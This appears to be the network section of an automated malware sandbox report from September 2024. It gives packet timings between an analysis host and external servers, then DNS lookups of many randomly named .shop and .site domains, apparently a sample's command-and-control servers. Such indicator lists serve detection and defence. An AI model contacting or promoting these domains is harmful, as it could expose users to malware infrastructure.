Sep 30, 2024 18:20:19.266387939 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266412020 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266418934 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266431093 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266808987 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266849041 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266869068 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.266874075 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.266899109 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.267000914 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.267046928 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.267049074 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.267064095 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.267102003 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.267103910 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.267241001 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.267258883 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.267303944 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.267313004 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.267406940 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268316984 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268368959 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268400908 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268407106 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268423080 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268438101 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268471956 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268491030 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268496990 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268516064 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268522024 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268562078 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268585920 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268590927 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268606901 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268675089 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268731117 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268753052 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268759966 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268775940 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268796921 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268838882 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268846035 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268913031 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268956900 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268980980 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.268985987 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.268996954 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.269004107 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.269037008 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.269041061 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.269052982 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.269500017 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.269623041 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.269629002 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.269819975 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.327244997 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:19.327300072 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:19.327452898 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:19.328707933 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:19.328736067 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:19.352844954 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.352924109 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.352947950 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.352961063 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.352987051 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353029013 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353235960 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.353259087 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.353291035 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353296041 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.353327036 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353365898 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353646994 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.353688955 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.353713036 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353715897 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.353740931 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.353760004 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.354252100 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.354271889 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.354350090 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.354350090 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.354357958 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.354463100 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.357547998 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.357572079 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.357626915 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.357635975 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.357683897 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.357722044 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.357886076 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.357913971 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.357947111 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.357952118 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.357975006 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.358030081 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.358382940 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.358405113 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.358438969 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.358443975 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.358474970 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.358509064 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.439564943 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.439600945 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.439646006 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.439659119 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.439690113 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.439970016 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.440509081 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.440602064 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:19.440620899 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.441340923 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:19.808334112 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:19.808439016 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:20.209950924 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:20.209979057 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:20.210351944 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:20.253906965 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:20.253906965 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:20.254069090 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:20.381306887 CEST	49718	443	192.168.2.10	188.114.97.3
Sep 30, 2024 18:20:20.381331921 CEST	443	49718	188.114.97.3	192.168.2.10
Sep 30, 2024 18:20:20.683047056 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:20.683140039 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:20.683213949 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:20.711750984 CEST	49719	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:20.711775064 CEST	443	49719	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:23.438237906 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:23.438296080 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:23.438371897 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:23.439483881 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:23.439496994 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:23.927562952 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:23.927659035 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:23.938235044 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:23.938247919 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:23.938590050 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:24.077677965 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:24.139740944 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:24.139781952 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:24.139929056 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:24.575253010 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:24.575377941 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:24.575562954 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:24.581454992 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:24.581480980 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:24.581494093 CEST	49726	443	192.168.2.10	188.114.96.3
Sep 30, 2024 18:20:24.581500053 CEST	443	49726	188.114.96.3	192.168.2.10
Sep 30, 2024 18:20:24.779731989 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:24.779767036 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:24.779833078 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:24.780164957 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:24.780179024 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.252211094 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.252278090 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:25.513663054 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:25.513684034 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.514050007 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.518726110 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:25.518749952 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:25.519036055 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.990278006 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.990377903 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:25.990653038 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:26.004371881 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:26.004399061 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:26.004412889 CEST	49728	443	192.168.2.10	104.21.1.169
Sep 30, 2024 18:20:26.004421949 CEST	443	49728	104.21.1.169	192.168.2.10
Sep 30, 2024 18:20:26.356164932 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:26.356225967 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:26.356328011 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:26.357289076 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:26.357305050 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:26.996531010 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:26.996601105 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.015208960 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.015232086 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.015539885 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.017213106 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.063401937 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.522783995 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.522806883 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.522824049 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.522852898 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.522882938 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.522911072 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.523041964 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.623433113 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.623457909 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.623758078 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.623783112 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.624310017 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.628747940 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.628822088 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.628829956 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.628854036 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.628880024 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.628976107 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.629789114 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.629806995 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.629842043 CEST	49732	443	192.168.2.10	104.102.49.254
Sep 30, 2024 18:20:27.629848003 CEST	443	49732	104.102.49.254	192.168.2.10
Sep 30, 2024 18:20:27.664043903 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:27.664155006 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:27.664258957 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:27.664539099 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:27.664571047 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.121468067 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.121702909 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.128922939 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.128974915 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.129281998 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.130603075 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.130700111 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.130747080 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.638307095 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.638405085 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.638463974 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.642021894 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.642049074 CEST	443	49733	172.67.197.40	192.168.2.10
Sep 30, 2024 18:20:28.642060995 CEST	49733	443	192.168.2.10	172.67.197.40
Sep 30, 2024 18:20:28.642066956 CEST	443	49733	172.67.197.40	192.168.2.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 30, 2024 18:20:00.909548044 CEST	58792	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:00.919317961 CEST	53	58792	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:16.577439070 CEST	62005	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:16.587315083 CEST	53	62005	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:16.717881918 CEST	65184	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:16.730690956 CEST	53	65184	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:16.779439926 CEST	49789	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:16.791752100 CEST	53	49789	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:16.795526981 CEST	51044	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:16.882416010 CEST	53	51044	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:16.889039993 CEST	62402	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:16.898658991 CEST	53	62402	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:16.933938026 CEST	51291	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:16.946209908 CEST	53	51291	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:17.496229887 CEST	58599	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:17.508163929 CEST	53	58599	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:17.525474072 CEST	63652	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:17.535638094 CEST	53	63652	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:17.581168890 CEST	49520	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:17.590591908 CEST	53	49520	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:17.652822971 CEST	59428	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:17.661875010 CEST	53	59428	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:19.302640915 CEST	65150	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:19.318198919 CEST	53	65150	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:23.388037920 CEST	53940	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:23.402647018 CEST	53	53940	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:24.590801001 CEST	53399	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:24.618031979 CEST	53	53399	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:24.708420992 CEST	54526	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:24.718199015 CEST	53	54526	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:24.742022038 CEST	55506	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:24.751950979 CEST	53	55506	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:24.760160923 CEST	60760	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:24.779009104 CEST	53	60760	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:26.074348927 CEST	63354	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:26.084053040 CEST	53	63354	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:26.132198095 CEST	50282	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:26.141530991 CEST	53	50282	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:26.194394112 CEST	59501	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:26.204060078 CEST	53	59501	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:26.321582079 CEST	59777	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:26.332817078 CEST	53	59777	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:26.334974051 CEST	58436	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:26.345108986 CEST	53	58436	1.1.1.1	192.168.2.10
Sep 30, 2024 18:20:56.128375053 CEST	59836	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:20:56.483170033 CEST	53	59836	1.1.1.1	192.168.2.10
Sep 30, 2024 18:21:00.354989052 CEST	61892	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:21:00.454200983 CEST	53	61892	1.1.1.1	192.168.2.10
Sep 30, 2024 18:21:06.777870893 CEST	59162	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:21:07.120635033 CEST	53	59162	1.1.1.1	192.168.2.10
Sep 30, 2024 18:21:11.511609077 CEST	55467	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:21:11.520112991 CEST	53	55467	1.1.1.1	192.168.2.10
Sep 30, 2024 18:21:18.524677038 CEST	61851	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:21:18.614612103 CEST	53	61851	1.1.1.1	192.168.2.10
Sep 30, 2024 18:21:45.815359116 CEST	54092	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:21:45.904159069 CEST	53	54092	1.1.1.1	192.168.2.10
Sep 30, 2024 18:21:56.017527103 CEST	58475	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:21:56.107593060 CEST	53	58475	1.1.1.1	192.168.2.10
Sep 30, 2024 18:22:06.255696058 CEST	49976	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:22:06.345465899 CEST	53	49976	1.1.1.1	192.168.2.10
Sep 30, 2024 18:22:46.838383913 CEST	49694	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:22:46.931672096 CEST	53	49694	1.1.1.1	192.168.2.10
Sep 30, 2024 18:23:36.074611902 CEST	53112	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:23:36.412744999 CEST	53	53112	1.1.1.1	192.168.2.10
Sep 30, 2024 18:24:03.722990036 CEST	59038	53	192.168.2.10	1.1.1.1
Sep 30, 2024 18:24:03.818559885 CEST	53	59038	1.1.1.1	192.168.2.10

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Sep 30, 2024 18:20:00.909548044 CEST	192.168.2.10	1.1.1.1	0xdb6c	Standard query (0)	file.garden	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.577439070 CEST	192.168.2.10	1.1.1.1	0xd3ce	Standard query (0)	tiddymarktwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.717881918 CEST	192.168.2.10	1.1.1.1	0x69d7	Standard query (0)	surveriysiop.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.779439926 CEST	192.168.2.10	1.1.1.1	0x36df	Standard query (0)	captainynfanw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.795526981 CEST	192.168.2.10	1.1.1.1	0xf08d	Standard query (0)	tearrybyiwo.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.889039993 CEST	192.168.2.10	1.1.1.1	0xe217	Standard query (0)	appleboltelwk.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:16.933938026 CEST	192.168.2.10	1.1.1.1	0x93bd	Standard query (0)	tendencerangej.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.496229887 CEST	192.168.2.10	1.1.1.1	0x4476	Standard query (0)	fossillargeiw.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.525474072 CEST	192.168.2.10	1.1.1.1	0x43a	Standard query (0)	coursedonnyre.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.581168890 CEST	192.168.2.10	1.1.1.1	0x3b13	Standard query (0)	strappystyio.shop	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:17.652822971 CEST	192.168.2.10	1.1.1.1	0x6dca	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:19.302640915 CEST	192.168.2.10	1.1.1.1	0xc6f2	Standard query (0)	offeviablwke.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:23.388037920 CEST	192.168.2.10	1.1.1.1	0x57fd	Standard query (0)	explorationmsn.store	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.590801001 CEST	192.168.2.10	1.1.1.1	0xc7de	Standard query (0)	famikyjdiag.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.708420992 CEST	192.168.2.10	1.1.1.1	0x7fd7	Standard query (0)	possiwreeste.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.742022038 CEST	192.168.2.10	1.1.1.1	0x47ee	Standard query (0)	commandejorsk.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:24.760160923 CEST	192.168.2.10	1.1.1.1	0x884e	Standard query (0)	underlinemdsj.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.074348927 CEST	192.168.2.10	1.1.1.1	0x32c5	Standard query (0)	bellykmrebk.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.132198095 CEST	192.168.2.10	1.1.1.1	0x1d61	Standard query (0)	agentyanlark.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.194394112 CEST	192.168.2.10	1.1.1.1	0x8202	Standard query (0)	writekdmsnu.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.321582079 CEST	192.168.2.10	1.1.1.1	0x94b9	Standard query (0)	delaylacedmn.site	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:26.334974051 CEST	192.168.2.10	1.1.1.1	0x887c	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Sep 30, 2024 18:20:56.128375053 CEST	192.168.2.10	1.1.1.1	0x7649	Standard query (0)	zelensky.top	A (IP address)	IN (0x0001)	false
